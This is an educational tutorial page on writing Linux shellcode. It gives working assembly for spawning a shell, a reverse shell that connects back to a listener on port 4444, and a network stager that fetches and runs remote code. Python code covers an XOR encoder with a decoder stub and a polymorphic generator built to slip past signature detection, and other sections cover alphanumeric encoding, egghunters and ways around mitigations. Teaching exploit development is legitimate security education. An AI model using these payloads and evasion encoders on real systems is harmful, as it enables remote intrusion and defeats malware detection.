In 1996, the first public examples of "shellcode" emerged—compact, self-contained machine code designed to spawn a command shell when executed. The name stuck: whether the payload downloads a file, establishes a network connection, or modifies system configuration, we still call it shellcode.
Code injection represents the culmination of a buffer overflow attack. Once an attacker controls the instruction pointer, they must provide something meaningful for the CPU to execute. Writing effective shellcode is a discipline that combines low-level assembly programming, deep understanding of OS internals, and creative problem-solving to work around constraints.
This page transforms you from understanding exploitation conceptually to understanding the payload itself—the bytes that make exploitation worthwhile.
By the end of this page, you will understand: how to write position-independent shellcode, system call mechanics for spawning shells and making network connections, encoding techniques to bypass character filters, polymorphic and metamorphic shellcode concepts, and the practical limitations of modern shellcode deployment.
Shellcode is machine code (raw CPU instructions) designed to execute arbitrary operations when injected into a running process. Unlike compiled programs, shellcode has unique constraints:
Position Independence: Shellcode doesn't know where in memory it will land. It cannot use absolute addresses for its own data or code. All references must be relative or computed at runtime.
Self-Containment: Shellcode typically cannot rely on external libraries being loaded at known addresses. It must make direct system calls or use carefully-located library functions.
Size Minimization: The payload must fit in whatever space the vulnerable buffer leaves available. Every byte counts when you're working within a 64-byte or 128-byte overflow window.
Character Restrictions: Many vulnerabilities involve string functions that stop at or mangle certain bytes (strcpy, for example, stops copying at the first null byte). Shellcode must avoid or encode those bytes.
The term 'shellcode' originated because early payloads primarily spawned interactive shells (/bin/sh on Unix). Today, shellcode might exfiltrate data, establish persistent backdoors, mine cryptocurrency, or deliver ransomware—but the name persists as a historical artifact of the exploit development community.
Position-independent code (PIC) executes correctly regardless of where it's loaded in memory. This is essential for shellcode because we can't predict the exact address where our payload will land.
The Problem: Shellcode often needs to reference strings (like /bin/sh) or other data. Normal code uses absolute addresses, but we don't know our address.
The Solution: Multiple techniques exist to create position-independent references:
RIP-relative addressing (x86-64 only): use lea rax, [rip+offset] to get an address relative to the current instruction. Very clean on modern architectures.
```nasm
;; JMP-CALL-POP technique for a position-independent string reference
;; This is the classic technique; it works on both x86 and x86-64

section .text
global _start

_start:
    jmp short get_string_addr   ; Jump forward, past the code, to the CALL

execute_shell:
    pop rdi                     ; Pop string address from stack
                                ; (CALL pushed the address of the string)
    xor rsi, rsi                ; argv = NULL
    xor rdx, rdx                ; envp = NULL
    push 59                     ; syscall number for execve
    pop rax                     ; push/pop avoids the null bytes of mov rax, 59
    syscall                     ; execve("/bin/sh", NULL, NULL)

get_string_addr:
    call execute_shell          ; CALL pushes address of next byte (the string)
    db "/bin/sh", 0             ; String data immediately after CALL
                                ; (the trailing 0 is the listing's only null byte)

;; Assembled, this becomes:
;;   eb 0c                      jmp short get_string_addr (+12 bytes)
;;   5f                         pop rdi
;;   48 31 f6                   xor rsi, rsi
;;   48 31 d2                   xor rdx, rdx
;;   6a 3b                      push 59
;;   58                         pop rax
;;   0f 05                      syscall
;;   e8 ef ff ff ff             call execute_shell (-17 bytes)
;;   2f 62 69 6e 2f 73 68 00    "/bin/sh\0"
```
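The displacement bytes of a relative jmp or call can be checked by hand. The sketch below is a hypothetical helper (rel_displacement is not part of any tool) that assumes the layout of the JMP-CALL-POP example: a 2-byte short jmp at offset 0, 12 bytes of code, then a 5-byte call at offset 14. x86 measures the displacement from the end of the branch instruction.

```python
def rel_displacement(instr_offset: int, instr_len: int,
                     target_offset: int, width: int) -> bytes:
    """Encode a relative branch displacement as little-endian bytes.

    The CPU adds the displacement to the address of the NEXT instruction,
    so the value is target - (instr_offset + instr_len).
    """
    disp = target_offset - (instr_offset + instr_len)
    return disp.to_bytes(width, "little", signed=True)


# Assumed layout: jmp at 0 (2 bytes), code body at 2 (12 bytes), call at 14 (5 bytes)
JMP_AT, BODY_AT, CALL_AT = 0, 2, 14

jmp_rel8 = rel_displacement(JMP_AT, 2, CALL_AT, width=1)
call_rel32 = rel_displacement(CALL_AT, 5, BODY_AT, width=4)

print(jmp_rel8.hex())    # 0c
print(call_rel32.hex())  # efffffff
```

The backward call is the reason the technique jumps forward first: a small negative rel32 is padded with ff bytes, whereas a forward call over a short distance would be padded with 00 bytes.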
```nasm
;; Stack-based string building (no JMP-CALL needed)
;; Push string onto stack, reference via RSP

section .text
global _start

_start:
    xor rsi, rsi                    ; RSI = 0 (also serves as null terminator)
    push rsi                        ; Push null terminator onto stack

    ; Push "/bin//sh" (exactly 8 bytes, so one full-width push with no padding)
    ; As a little-endian immediate: 0x68732f2f6e69622f
    mov rdi, 0x68732f2f6e69622f     ; "/bin//sh"
    push rdi                        ; Push string onto stack
    mov rdi, rsp                    ; RDI = pointer to string on stack

    ; RSI already 0 (argv = NULL)
    xor rdx, rdx                    ; envp = NULL
    push 59
    pop rax                         ; Syscall number (execve = 59)
    syscall

;; Key insight: the string "/bin//sh" is built on the stack
;; The kernel ignores the doubled slash during path lookup, and it gives us exactly 8 bytes
;; The assembled code contains no null bytes: the terminator is created at runtime
;; by pushing a zeroed register
```

Using '/bin//sh' instead of '/bin/sh' gives exactly 8 bytes, a convenient size for 64-bit register operations. Unix systems treat consecutive slashes as a single slash, so '/bin//sh' is equivalent to '/bin/sh'. This trick is ubiquitous in shellcode development.
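The 64-bit immediate in the stack-based listing is simply the eight path bytes read as a little-endian integer. A minimal sketch (pack_path_qword is a hypothetical helper name) shows the conversion and why the 7-byte '/bin/sh' is less convenient:

```python
def pack_path_qword(path: bytes) -> int:
    """Return the 64-bit immediate whose little-endian bytes spell `path`."""
    if len(path) != 8:
        raise ValueError("path must be exactly 8 bytes to fill one register")
    if b"\x00" in path:
        raise ValueError("path would put a null byte into the immediate")
    return int.from_bytes(path, "little")


imm = pack_path_qword(b"/bin//sh")
print(hex(imm))  # 0x68732f2f6e69622f

# Padding the 7-byte path to 8 bytes would require a null byte in the immediate
try:
    pack_path_qword(b"/bin/sh\x00")
except ValueError as exc:
    print("rejected:", exc)
```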
Shellcode operates in user space but needs kernel services—spawning processes, opening network connections, reading files. On Linux, this is accomplished through system calls (syscalls).
System Call Invocation on Linux x86-64:
- The syscall number goes in RAX.
- Arguments go in RDI, RSI, RDX, R10, R8, R9, in that order.
- The syscall instruction enters the kernel; the return value comes back in RAX (RCX and R11 are clobbered).

| Syscall | Number (x64) | Arguments | Purpose |
|---|---|---|---|
| execve | 59 (0x3b) | rdi=path, rsi=argv, rdx=envp | Execute a program (spawn shell) |
| read | 0 | rdi=fd, rsi=buf, rdx=count | Read from file descriptor |
| write | 1 | rdi=fd, rsi=buf, rdx=count | Write to file descriptor |
| open | 2 | rdi=path, rsi=flags, rdx=mode | Open a file |
| socket | 41 | rdi=domain, rsi=type, rdx=proto | Create network socket |
| connect | 42 | rdi=sockfd, rsi=addr, rdx=len | Connect to remote host |
| dup2 | 33 | rdi=oldfd, rsi=newfd | Duplicate file descriptor |
| mprotect | 10 | rdi=addr, rsi=len, rdx=prot | Change memory permissions |
| fork | 57 | (none) | Create child process |
| exit | 60 | rdi=status | Terminate process cleanly |
```nasm
;; Reverse shell shellcode for Linux x86-64
;; Connects back to 127.0.0.1:4444 and spawns /bin/sh
;; Attacker runs: nc -lvp 4444

section .text
global _start

_start:
    ;; Create socket: socket(AF_INET=2, SOCK_STREAM=1, 0)
    xor rdi, rdi
    push rdi                    ; Push 0
    pop rsi                     ; RSI = 0
    inc rsi                     ; RSI = 1 (SOCK_STREAM)
    push 2
    pop rdi                     ; RDI = 2 (AF_INET)
    xor rdx, rdx                ; RDX = 0 (protocol)
    push 41
    pop rax                     ; syscall 41 = socket
    syscall
    mov r12, rax                ; Save socket fd in R12

    ;; Build sockaddr_in structure on stack
    ;; struct sockaddr_in { sin_family=2, sin_port=4444, sin_addr=127.0.0.1 }
    xor rax, rax
    push rax                    ; sin_zero padding
    mov eax, 0x0100007f         ; 127.0.0.1 in network byte order
                                ; (note: this immediate contains 0x00 bytes)
    push rax                    ; sin_addr
    push word 0x5c11            ; port 4444: stored as bytes 11 5c (network order)
    push word 2                 ; AF_INET
    mov rsi, rsp                ; RSI = pointer to sockaddr_in

    ;; Connect: connect(sockfd, &sockaddr, 16)
    mov rdi, r12                ; Socket fd
    push 16
    pop rdx                     ; Address length
    push 42
    pop rax                     ; syscall 42 = connect
    syscall

    ;; Duplicate socket to stdin/stdout/stderr
    ;; dup2(sockfd, 0), dup2(sockfd, 1), dup2(sockfd, 2)
    mov rdi, r12                ; Socket fd
    xor rsi, rsi                ; Start with fd 0 (stdin)
dup_loop:
    push 33
    pop rax                     ; syscall 33 = dup2 (RAX is reloaded each pass
                                ; because the syscall overwrites it)
    syscall
    inc rsi
    cmp rsi, 3
    jne dup_loop

    ;; Execute shell: execve("/bin//sh", NULL, NULL)
    xor rsi, rsi
    push rsi                    ; NULL terminator
    mov rdi, 0x68732f2f6e69622f ; "/bin//sh"
    push rdi
    mov rdi, rsp                ; RDI = pointer to string
    xor rdx, rdx                ; envp = NULL
    push 59
    pop rax                     ; syscall 59 = execve
    syscall
```

On 32-bit Linux, syscalls use int 0x80 with the syscall number in EAX and arguments in EBX, ECX, EDX, ESI, EDI, EBP. On 64-bit Linux, the syscall instruction and a different register set are used. Syscall numbers also differ between 32-bit and 64-bit (execve is 11 on 32-bit and 59 on 64-bit). Always use the correct syscall table for your target architecture.
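The sockaddr_in immediates in the reverse-shell listing (0x5c11 and 0x0100007f) look reversed because the structure stores port and address in network (big-endian) byte order while x86 writes immediates little-endian. A short sketch, assuming AF_INET is 2 as on Linux, builds the 16-byte structure and recovers both immediates; build_sockaddr_in is a hypothetical helper name.

```python
import socket
import struct


def build_sockaddr_in(ip: str, port: int) -> bytes:
    """Lay out a 16-byte IPv4 sockaddr_in the way the kernel expects it."""
    family = struct.pack("<H", 2)      # sin_family: AF_INET (2), host byte order
    port_be = struct.pack(">H", port)  # sin_port: network byte order
    addr_be = socket.inet_aton(ip)     # sin_addr: 4 bytes, network byte order
    return family + port_be + addr_be + bytes(8)  # sin_zero padding


sa = build_sockaddr_in("127.0.0.1", 4444)
print(sa.hex())  # 0200115c7f0000010000000000000000

# The values a little-endian CPU must push to produce those bytes in memory
port_imm = int.from_bytes(sa[2:4], "little")
addr_imm = int.from_bytes(sa[4:8], "little")
print(hex(port_imm), hex(addr_imm))  # 0x5c11 0x100007f
```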
Bad characters are bytes that the vulnerability context corrupts, terminates, or filters. Common bad characters include:
- \x00 (NULL): Terminates strings in C
- \x0a (newline): Terminates input for fgets, line-based protocols
- \x0d (carriage return): Terminates input in some contexts
- \x20 (space): May be treated as delimiter
- \x09 (tab): May be treated as whitespace
- \xff: Sometimes filtered by UTF-8 validation

The specific bad characters depend on the vulnerability and input handling.
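Checking a byte string against a bad-character list is a simple scan. The sketch below (find_bad_bytes is a hypothetical helper) reports the offset and value of each offending byte, and compares two encodings of "load 59 into RAX": mov eax, 59 carries three null bytes in its immediate, while push 59; pop rax carries none.

```python
def find_bad_bytes(payload: bytes, bad_chars: bytes) -> list[tuple[int, int]]:
    """Return (offset, byte value) for every byte of payload found in bad_chars."""
    bad = set(bad_chars)
    return [(i, b) for i, b in enumerate(payload) if b in bad]


BAD = b"\x00\x0a\x0d"

# xor rsi, rsi; mov eax, 59; syscall
with_mov = bytes.fromhex("4831f6" "b83b000000" "0f05")
# xor rsi, rsi; push 59; pop rax; syscall
with_push_pop = bytes.fromhex("4831f6" "6a3b58" "0f05")

hits = find_bad_bytes(with_mov, BAD)
print(hits)                                # [(5, 0), (6, 0), (7, 0)]
print(find_bad_bytes(with_push_pop, BAD))  # []
```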
```python
#!/usr/bin/env python3
"""
XOR Encoder for Shellcode
Encodes shellcode to avoid specified bad characters.
Prepends a decoder stub that runs first and decodes the payload.
"""


def xor_encode(shellcode: bytes, key: int) -> bytes:
    """XOR encode shellcode with given key."""
    return bytes(b ^ key for b in shellcode)


def find_xor_key(shellcode: bytes, bad_chars: bytes) -> int:
    """Find an XOR key that, when applied, produces no bad characters."""
    for key in range(1, 256):  # Skip 0: XOR with 0 is a no-op
        # The key itself appears in the decoder stub, so it must be clean too
        if key in bad_chars:
            continue
        encoded = xor_encode(shellcode, key)
        if not any(c in bad_chars for c in encoded):
            return key
    raise ValueError("No valid XOR key found - try multi-byte encoding")


def generate_decoder_stub(key: int, length: int) -> bytes:
    """
    Generate an x86-64 decoder stub that XOR-decodes the payload
    following it, in place. Uses JMP-CALL-POP to find the payload.
    """
    if not 1 <= length <= 255:
        raise ValueError("length must fit in CL (1-255)")
    return bytes([
        0xeb, 0x0f,                    # jmp short get_payload_addr (+15)
        # decoder_start:
        0x5e,                          # pop rsi (address of encoded payload)
        0x31, 0xc9,                    # xor ecx, ecx
        0xb1, length,                  # mov cl, length
        # decode:
        0x80, 0x36, key,               # xor byte [rsi], key
        0x48, 0xff, 0xc6,              # inc rsi (0x46 alone is a REX prefix in 64-bit mode)
        0xe2, 0xf8,                    # loop decode (-8)
        0xeb, 0x05,                    # jmp short payload (skip the call)
        # get_payload_addr:
        0xe8, 0xec, 0xff, 0xff, 0xff,  # call decoder_start (-20)
        # Encoded payload follows here
    ])


# Example usage
original_shellcode = bytes([
    0x48, 0x31, 0xf6,                    # xor rsi, rsi
    0x56,                                # push rsi (null terminator)
    0x48, 0xbf, 0x2f, 0x62, 0x69, 0x6e,  # mov rdi, "/bin//sh"
    0x2f, 0x2f, 0x73, 0x68,
    0x57,                                # push rdi
    0x48, 0x89, 0xe7,                    # mov rdi, rsp
    0x48, 0x31, 0xd2,                    # xor rdx, rdx
    0x6a, 0x3b, 0x58,                    # push 59; pop rax
    0x0f, 0x05,                          # syscall
])

bad_chars = b"\x00\x0a\x0d"

print(f"Original shellcode: {len(original_shellcode)} bytes")
print(f"Bad characters to avoid: {bad_chars.hex()}")

# Find suitable key
key = find_xor_key(original_shellcode, bad_chars)
print(f"XOR key found: 0x{key:02x}")

# Encode
encoded = xor_encode(original_shellcode, key)
print(f"Encoded shellcode: {encoded.hex()}")

# Generate complete payload with decoder
decoder = generate_decoder_stub(key, len(original_shellcode))
final_payload = decoder + encoded

# Verify no bad chars anywhere, including the stub (its length byte can be one)
offenders = [b for b in final_payload if b in bad_chars]
if offenders:
    print(f"ERROR: Bad char 0x{offenders[0]:02x} in final payload!")
else:
    print("✓ No bad characters in final payload")

print(f"Final payload: {len(final_payload)} bytes")
print(f"Payload hex: {final_payload.hex()}")
```

XOR-encoded shellcode works by prepending a small decoder stub. When execution reaches the payload, the decoder runs first, XORing each byte with the key to reveal the original shellcode, then jumps to execute it. The decoder itself must be null-free and avoid bad characters, which constrains decoder design. Because decoding happens in place, the payload must also sit in memory that is writable as well as executable.
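Two properties make single-byte XOR convenient here, and both are easy to check. XOR is its own inverse, so the same operation encodes and decodes; and an encoded byte is 0x00 exactly when the original byte equals the key, so the null-free keys are the values that do not occur in the payload. The sketch below uses hypothetical helper names and an arbitrary 8-byte sample.

```python
def xor_bytes(data: bytes, key: int) -> bytes:
    """Apply a single-byte XOR key to every byte of data."""
    return bytes(b ^ key for b in data)


def null_free_keys(data: bytes) -> list[int]:
    """Keys in 1..255 that never yield 0x00: exactly those absent from data."""
    present = set(data)
    return [k for k in range(1, 256) if k not in present]


data = bytes.fromhex("4831f66a3b580f05")  # arbitrary sample bytes
keys = null_free_keys(data)
key = keys[0]
encoded = xor_bytes(data, key)

print(hex(key))                         # 0x1
print(b"\x00" in encoded)               # False
print(xor_bytes(encoded, key) == data)  # True: decoding is the same operation

# A key that appears in the data produces a null byte at that position
print(b"\x00" in xor_bytes(data, 0x48))  # True
```

If every value from 1 to 255 occurs in the payload, no single-byte key is null-free, which is the case the encoder's "try multi-byte encoding" error refers to.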
Some vulnerability contexts are extremely restrictive, allowing only alphanumeric characters (A-Z, a-z, 0-9) or even narrower byte ranges. Additionally, signature-based detection systems may block known shellcode patterns. Advanced techniques address both challenges.
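To see what an alphanumeric filter leaves available, it helps to classify candidate bytes mechanically. The sketch below uses hypothetical helper names and two illustrative 32-bit masks that share no set bits, so ANDing a register with both always clears it. It also shows that XORing alphanumeric bytes together can never set the high bit.

```python
import string

ALNUM = set((string.ascii_letters + string.digits).encode())


def is_alnum(data: bytes) -> bool:
    """True if every byte is in A-Z, a-z, or 0-9."""
    return all(b in ALNUM for b in data)


def le32(value: int) -> bytes:
    """The four bytes of a 32-bit immediate as they appear in the instruction."""
    return value.to_bytes(4, "little")


MASK_A, MASK_B = 0x554e4d4a, 0x2a313235  # illustrative masks with no common bits

print(MASK_A & MASK_B)         # 0: AND with both masks zeroes any register
print(le32(MASK_A), is_alnum(le32(MASK_A)))  # b'JMNU' True
print(le32(MASK_B), is_alnum(le32(MASK_B)))  # b'521*' False ('*' is only printable)
print(is_alnum(b"\x25"))       # False: '%', the AND EAX opcode, is only printable
print(is_alnum(b"\x35"))       # True: '5', the XOR EAX opcode

# XOR of any two alphanumeric bytes stays below 0x80
print(max(a ^ b for a in ALNUM for b in ALNUM) < 0x80)  # True
```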
```nasm
;; Printable and alphanumeric instructions (32-bit x86)
;; Alphanumeric opcodes fall within the A-Z, a-z, 0-9 ASCII ranges
;;
;; Alphanumeric:
;;   push/pop certain registers: P (0x50) = push eax, X (0x58) = pop eax
;;   inc/dec:                    A (0x41) = inc ecx, I (0x49) = dec ecx, etc.
;;   xor eax, imm32:             5 (0x35)
;; Printable but not alphanumeric:
;;   and eax, imm32:             % (0x25)
;;
;; Example: loading a chosen constant into EAX
;; Approach: AND with two masks that share no set bits (EAX becomes 0),
;; then XOR in the target

push eax                ; P (0x50), alphanumeric
and eax, 0x554e4d4a     ; bytes "%JMNU"
and eax, 0x2a313235     ; bytes "%521*"; 0x554e4d4a & 0x2a313235 = 0x00000000
xor eax, 0x39443143     ; bytes "5C1D9"; EAX = 0x39443143

;; XOR with alphanumeric immediates can only produce bytes below 0x80.
;; A value such as 0x99c0cd80 (which contains cd 80, int 0x80) needs further
;; arithmetic, for example SUB with wrap-around.
;;
;; After building a decoder from such instructions, decode and run the real shellcode
;;
;; Tools like alpha2 automatically generate these sequences
;; Example: msfvenom -p linux/x86/shell_reverse_tcp ... -e x86/alpha_mixed
```

Polymorphic Shellcode
Polymorphic shellcode changes its appearance on each generation while maintaining identical functionality. This defeats signature-based detection that looks for specific byte patterns.
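How Polymorphism Works:
- The payload is encoded with a key chosen at generation time (for example, a random single-byte XOR key).
- A decoder stub is prepended to restore the payload at runtime.
- The stub itself is varied (different registers, junk instructions, NOP-equivalent padding) so that no fixed byte pattern survives between variants.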
```python
#!/usr/bin/env python3
"""
Simple Polymorphic Shellcode Generator (32-bit x86)
Generates unique encoded variants of base shellcode.
"""

import hashlib
import random


def generate_polymorphic_variant(shellcode: bytes) -> bytes:
    """Generate a unique polymorphic variant of shellcode."""
    # Random XOR key (avoid 0x00)
    key = random.randint(1, 255)

    # Encode shellcode
    encoded = bytes(b ^ key for b in shellcode)

    # Generate decoder with random variations
    decoder = generate_varied_decoder(key, len(shellcode))

    # Add random NOP sled variation
    nop_variants = [
        b"\x90",      # nop
        b"\x40\x48",  # inc eax; dec eax (cancel each other out)
        b"\x87\xc0",  # xchg eax, eax
        b"\x86\xc9",  # xchg cl, cl
    ]
    nop_sled = b"".join(
        random.choice(nop_variants) for _ in range(random.randint(8, 32))
    )
    return nop_sled + decoder + encoded


def generate_varied_decoder(key: int, length: int) -> bytes:
    """Generate decoder with random instruction choices."""
    if not 1 <= length <= 255:
        raise ValueError("length must fit in an 8-bit counter (1-255)")

    # Choose random register for loop counter (CL or BL)
    if random.choice([True, False]):
        set_counter = bytes([0x31, 0xc9, 0xb1, length])  # xor ecx,ecx; mov cl,len
        loop_inst = bytes([0xe2])                         # loop rel8
    else:
        set_counter = bytes([0x31, 0xdb, 0xb3, length])  # xor ebx,ebx; mov bl,len
        loop_inst = bytes([0xfe, 0xcb, 0x75])             # dec bl; jnz rel8

    # Random junk instructions to insert (no-ops that change the signature)
    junk = random.choice([
        b"",          # No junk
        b"\x50\x58",  # push eax; pop eax
        b"\x51\x59",  # push ecx; pop ecx
        b"\x90",      # nop
    ])

    # Setup: the call below lands here, with the payload address on the stack
    setup = junk + bytes([0x5e]) + set_counter        # pop esi; counter = len

    # Decode loop; the branch offset depends on which loop form was chosen
    decode = bytes([0x80, 0x36, key, 0x46])            # xor byte [esi], key; inc esi
    loop_rel = -(len(decode) + len(loop_inst) + 1)     # back to start of decode
    decode += loop_inst + bytes([loop_rel & 0xff])

    skip_call = bytes([0xeb, 0x05])                    # jmp short over the 5-byte call

    # Offsets are computed from the actual lengths so every variant stays valid
    jmp_rel = len(setup) + len(decode) + len(skip_call)
    call_rel = -(jmp_rel + 5)                          # back to start of setup
    return (
        bytes([0xeb, jmp_rel])                         # jmp short to the call
        + setup + decode + skip_call
        + b"\xe8" + call_rel.to_bytes(4, "little", signed=True)
    )


# Generate multiple unique variants of same shellcode
base_shellcode = bytes([
    0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68,
    0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x50,
    0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80,
])

print("Generating 3 polymorphic variants:")
for i in range(3):
    variant = generate_polymorphic_variant(base_shellcode)
    print(f"\nVariant {i+1}: {len(variant)} bytes")
    print(f"  First 20 bytes: {variant[:20].hex()}")
    # hashlib gives a stable digest; the built-in hash() of bytes varies per process
    print(f"  Hash: {hashlib.sha256(variant).hexdigest()[:8]}")
```

Beyond polymorphism lies metamorphic code, which actually rewrites its own logic (not just its encoding) to generate functionally equivalent but structurally different variants. True metamorphic engines are complex, but because they vary the instruction sequences themselves, they can evade pattern matching that still works against a merely re-encoded payload.
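From the detection side, the effect of re-encoding on a fixed byte signature, and one simple countermeasure, can be sketched in a few lines. The code below is a toy model with hypothetical names, not how any particular scanner works: a plain substring match misses XOR-encoded variants, while trying all 256 single-byte keys recovers both the signature and the key.

```python
def xor_bytes(data: bytes, key: int) -> bytes:
    """Apply a single-byte XOR key to every byte of data."""
    return bytes(b ^ key for b in data)


def contains_signature(blob: bytes, signature: bytes) -> bool:
    """Naive signature match: a plain substring search."""
    return signature in blob


def xor_bruteforce_scan(blob: bytes, signature: bytes) -> list[int]:
    """Return every single-byte key under which blob reveals the signature."""
    return [k for k in range(256) if signature in xor_bytes(blob, k)]


signature = b"/bin//sh"
plain = b"\x90\x90" + signature + b"\x0f\x05"  # stand-in for a known payload

variant_a = xor_bytes(plain, 0x41)
variant_b = xor_bytes(plain, 0x7e)

print(contains_signature(plain, signature))       # True
print(contains_signature(variant_a, signature))   # False
print(variant_a == variant_b)                     # False: no shared encoding
print(xor_bruteforce_scan(variant_a, signature))  # [65]
print(xor_bruteforce_scan(variant_b, signature))  # [126]
```

Brute-forcing the key only works because the key space is tiny, which is one reason detection often targets the decoder stub or runtime behaviour rather than the encoded bytes.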
Real-world exploitation often faces severe size constraints. A buffer might only hold 80 bytes—far too small for sophisticated payloads like Meterpreter. Staged payloads solve this by splitting the attack into multiple phases.
```nasm
;; Minimal TCP stager (reverse connect, receive, execute)
;; Assembles to roughly 100 bytes as written
;; Connects to attacker, receives arbitrary code, executes it

section .text
global _start

_start:
    ;; socket(AF_INET=2, SOCK_STREAM=1, 0)
    push 41                     ; syscall: socket
    pop rax
    push 2
    pop rdi                     ; AF_INET
    push 1
    pop rsi                     ; SOCK_STREAM
    xor rdx, rdx                ; 0
    syscall
    mov r12, rax                ; Save socket fd

    ;; Build sockaddr_in and connect
    push rdx                    ; 0 padding
    mov eax, 0x0100007f         ; 127.0.0.1
    push rax
    push word 0x5c11            ; Port 4444
    push word 2                 ; AF_INET
    push 42                     ; syscall: connect
    pop rax
    mov rdi, r12                ; socket fd
    mov rsi, rsp                ; sockaddr pointer
    push 16
    pop rdx                     ; addrlen
    syscall

    ;; mmap executable memory for payload
    push 9                      ; syscall: mmap
    pop rax
    xor rdi, rdi                ; addr = NULL
    push 4096
    pop rsi                     ; length
    push 7                      ; PROT_READ|WRITE|EXEC
    pop rdx
    push 0x22                   ; MAP_ANONYMOUS|PRIVATE
    pop r10
    push -1                     ; sign-extended to 64 bits (there is no push imm64)
    pop r8                      ; fd = -1
    xor r9, r9                  ; offset = 0
    syscall
    mov r13, rax                ; Save mmap address

    ;; read(socket, mmap_addr, 4096)
    xor rax, rax                ; syscall: read
    mov rdi, r12                ; socket fd
    mov rsi, r13                ; buffer (mmap)
    push 4096
    pop rdx                     ; count
    syscall

    ;; Jump to received payload
    jmp r13
```

Egghunter Technique
When you can inject a large payload into memory but only control a small buffer for the initial exploit, an egghunter bridges the gap:
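The large payload is prefixed with a unique marker (the "egg"), conventionally a 4-byte tag repeated twice, such as w00tw00t. The egghunter, a very small piece of shellcode placed in the constrained buffer, scans memory for the marker and jumps to the code that follows it.
Egghunters must handle unmapped memory without crashing (a stray read from an unmapped page kills the process) and must not mistake their own copy of the tag for the egg, which is why the tag appears twice in front of the payload.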
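The search logic can be simulated over an ordinary bytes object. This is only a model with a hypothetical helper name: a real egghunter is a few dozen bytes of assembly that walks the process address space and probes each page before reading it. The sketch shows why the doubled tag matters, since a lone copy of the tag (such as the one embedded in the hunter itself) is skipped.

```python
def find_egg(memory: bytes, tag: bytes) -> int:
    """Return the offset of the first byte after the doubled tag, or -1."""
    if len(tag) != 4:
        raise ValueError("tag is conventionally 4 bytes")
    egg = tag * 2
    pos = memory.find(egg)
    return -1 if pos < 0 else pos + len(egg)


tag = b"w00t"
memory = (
    b"\xcc" * 16
    + b"...w00t..."       # a single tag, e.g. the hunter's own copy
    + b"\xcc" * 8
    + tag * 2 + b"PAYLOAD"  # the egg, followed by the staged payload
)

start = find_egg(memory, tag)
print(start)           # 42
print(memory[start:])  # b'PAYLOAD'
print(find_egg(b"\xcc" * 32, tag))  # -1: no egg present
```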
Metasploit's payload system exemplifies staged architecture. Payloads like linux/x64/meterpreter/reverse_tcp are staged (small stager + full Meterpreter), while linux/x64/meterpreter_reverse_tcp is stageless (single large payload). Choose based on buffer size and operational requirements.
Modern operating systems and hardware have deployed multiple layers of defense that complicate shellcode execution. Understanding these challenges is essential for both offensive research and defensive awareness.
| Defense | Mechanism | Impact on Shellcode | Bypass Technique |
|---|---|---|---|
| DEP/NX | Data pages marked non-executable | Injected shellcode cannot run | ROP chains, ret2libc, calling mprotect |
| ASLR | Randomize library/stack addresses | Cannot predict where to return | Info leak, partial overwrite, brute force |
| Stack Canaries | Secret value before return address | Overflow detected before RET | Leak the canary (info leak, format string bug) |
| CFI | Control flow integrity checks | Invalid jump targets blocked | CFI-compliant gadgets, fine-grained attacks |
| Sandboxing | Restrict available syscalls | Shellcode functionality limited | Use allowed syscalls, sandbox escape |
Each defense spawns bypass research; each bypass prompts stronger defenses. Modern exploitation often requires chaining multiple vulnerabilities: one for info leak, one for control flow, one for privilege escalation. Single-bug exploitation is increasingly rare against hardened targets.
We've explored the art and science of shellcode development, from fundamental position-independent code to advanced polymorphic and staged payloads.
What's Next: Return-Oriented Programming
The next page explores Return-Oriented Programming (ROP)—the dominant technique for exploiting systems with DEP enabled. When we can't execute injected code, we chain existing code fragments to achieve arbitrary computation without ever executing attacker-controlled bytes directly.
You now understand the fundamentals of shellcode development: position independence, system call mechanics, encoding techniques, and the constraints imposed by modern defenses. This knowledge is essential for understanding both vulnerability exploitation and the design of effective mitigations.